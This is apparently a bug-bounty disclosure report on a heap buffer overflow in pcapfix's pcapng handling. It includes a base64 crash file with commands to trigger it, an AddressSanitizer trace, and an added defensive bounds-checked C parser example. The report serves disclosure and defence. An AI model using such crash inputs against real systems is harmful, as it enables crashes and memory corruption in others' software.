Heap-based Buffer Overflow in rup0rt/pcapfix

Valid

Reported on

Jun 9th 2021


✍️ Description

Whilst testing the 'devel' branch of pcapfix, specifically commit fb723c compiled with clang-13 and -fsanitize=address on Ubuntu 20.04.2 LTS, we discovered a PoC which triggers a heap-buffer-overflow.

🕵️‍♂️ Proof of Concept

git clone https://github.com/Rup0rt/pcapfix
cd pcapfix
CC=clang CFLAGS="-fsanitize=address" make
echo "Cg0NCvaPsvgUAAAAAEpaggAAAMeTilEAAABFAAA=" | base64 -d > /tmp/fuzz2.pcap
./pcapfix -v -s /tmp/fuzz2.pcap

The above POC produces this ASan stack trace:

==2556594==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000005d at pc 0x000000496d5a bp 0x7ffc1cef51b0 sp 0x7ffc1cef4978
WRITE of size 72 at 0x60300000005d thread T0
#0 0x496d59 in __asan_memcpy (/root/pcapfix/pcapfix+0x496d59)
#1 0x4d3fba in fix_pcapng /root/pcapfix/pcapng.c:371:11
#2 0x4c984d in main /root/pcapfix/pcapfix.c
#3 0x7f90330940b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#4 0x41c3ad in _start (/root/pcapfix/pcapfix+0x41c3ad)

0x60300000005d is located 0 bytes to the right of 29-byte region [0x603000000040,0x60300000005d)
allocated by thread T0 here:
#0 0x4978ed in __interceptor_malloc (/root/pcapfix/pcapfix+0x4978ed)
#1 0x4d316b in fix_pcapng /root/pcapfix/pcapng.c:213:17
#2 0x4c984d in main /root/pcapfix/pcapfix.c
#3 0x7f90330940b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow (/root/pcapfix/pcapfix+0x496d59) in __asan_memcpy
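The trace shows the shape of the bug: a 29-byte heap region (the size of the PoC file, allocated at pcapng.c:213) receives a 72-byte memcpy at pcapng.c:371, because the copy length is derived from attacker-controlled header fields rather than from the bytes actually present. The block total length field of the PoC file reads 0xf8b28ff6, far larger than the file. The following is an added example, not pcapfix's code and not the fix from commit b16917: a minimal, bounds-checked pcapng block reader that demonstrates the checks a practitioner wants before any copy sized from a block length. `poc_file` is the report's base64 decoded into a byte array; `good_file` is a constructed, well-formed section header block plus interface description block used for comparison.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* The 29-byte PoC from the report (its base64, decoded). */
static const uint8_t poc_file[] = {
    0x0a, 0x0d, 0x0d, 0x0a,  /* block type: section header block */
    0xf6, 0x8f, 0xb2, 0xf8,  /* block total length: 0xf8b28ff6, bogus */
    0x14, 0x00, 0x00, 0x00, 0x00, 0x4a, 0x5a, 0x82, 0x00, 0x00, 0x00, 0xc7,
    0x93, 0x8a, 0x51, 0x00, 0x00, 0x00, 0x45, 0x00, 0x00
};

/* Constructed well-formed capture: SHB (28 bytes) followed by IDB (20 bytes). */
static const uint8_t good_file[] = {
    0x0a, 0x0d, 0x0d, 0x0a, 0x1c, 0x00, 0x00, 0x00, 0x4d, 0x3c, 0x2b, 0x1a,
    0x01, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0x1c, 0x00, 0x00, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x04, 0x00, 0x14, 0x00, 0x00, 0x00
};

/* Result codes returned by check_block(). */
enum block_status {
    BLOCK_OK = 0,
    BLOCK_TRUNCATED_HEADER,    /* fewer than 8 bytes left for type + length   */
    BLOCK_LENGTH_TOO_SMALL,    /* total_length < 12 (type, length, trailer)   */
    BLOCK_LENGTH_EXCEEDS_FILE, /* total_length runs past the end of the data  */
    BLOCK_LENGTH_MISALIGNED,   /* total_length is not a multiple of 4         */
    BLOCK_TRAILER_MISMATCH     /* trailing length != leading length           */
};

/* Little-endian read; the constructed capture uses LE byte-order magic. */
static uint32_t rd32le(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Validate the block starting at buf[off] without copying anything.
 * On BLOCK_OK, *block_len receives the total length, which is now known
 * to fit inside the remaining bytes and is safe to use as a memcpy size. */
enum block_status check_block(const uint8_t *buf, size_t len, size_t off,
                              uint32_t *block_len)
{
    if (off > len || len - off < 8)
        return BLOCK_TRUNCATED_HEADER;
    uint32_t total = rd32le(buf + off + 4);
    if (total < 12)
        return BLOCK_LENGTH_TOO_SMALL;
    if (total > len - off)             /* compare against bytes actually present */
        return BLOCK_LENGTH_EXCEEDS_FILE;
    if (total % 4 != 0)
        return BLOCK_LENGTH_MISALIGNED;
    if (rd32le(buf + off + total - 4) != total)
        return BLOCK_TRAILER_MISMATCH;
    *block_len = total;
    return BLOCK_OK;
}

/* Copy one block into dst only after it has been validated and fits dst.
 * Returns the number of bytes copied, or 0 if the block was rejected. */
size_t copy_block(const uint8_t *buf, size_t len, size_t off,
                  uint8_t *dst, size_t dst_cap, enum block_status *why)
{
    uint32_t total;
    enum block_status st = check_block(buf, len, off, &total);
    if (why)
        *why = st;
    if (st != BLOCK_OK || total > dst_cap)
        return 0;
    memcpy(dst, buf + off, total);
    return total;
}

/* Walk the buffer and count consecutive valid blocks, stopping at the first bad one. */
size_t count_blocks(const uint8_t *buf, size_t len)
{
    size_t off = 0, n = 0;
    uint32_t total;
    while (off < len && check_block(buf, len, off, &total) == BLOCK_OK) {
        n++;
        off += total;
    }
    return n;
}

int main(void)
{
    uint32_t n;
    enum block_status st = check_block(poc_file, sizeof poc_file, 0, &n);
    printf("PoC: status %d, length field 0x%08x, file is %zu bytes\n",
           (int)st, rd32le(poc_file + 4), sizeof poc_file);
    printf("constructed capture: %zu valid block(s)\n",
           count_blocks(good_file, sizeof good_file));
    return 0;
}
```

The order of the checks matters: the remaining-bytes comparison comes before alignment and trailer checks, so the trailer read itself can never index past the buffer. A repair tool that intends to tolerate damaged length fields still needs this comparison; it can then fall back to scanning for the next plausible block type instead of copying the advertised length.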

💥 Impact

This vulnerability is capable of crashing the software, corrupting memory, and causing other unintended consequences resulting from writing outside of the buffer.

Occurrences

geeknik modified the report
a year ago
Robert Krause validated this vulnerability a year ago
geeknik has been awarded the disclosure bounty
The fix bounty is now up for grabs
Robert Krause marked this as fixed with commit b16917 a year ago
Robert Krause has been awarded the fix bounty
This vulnerability will not receive a CVE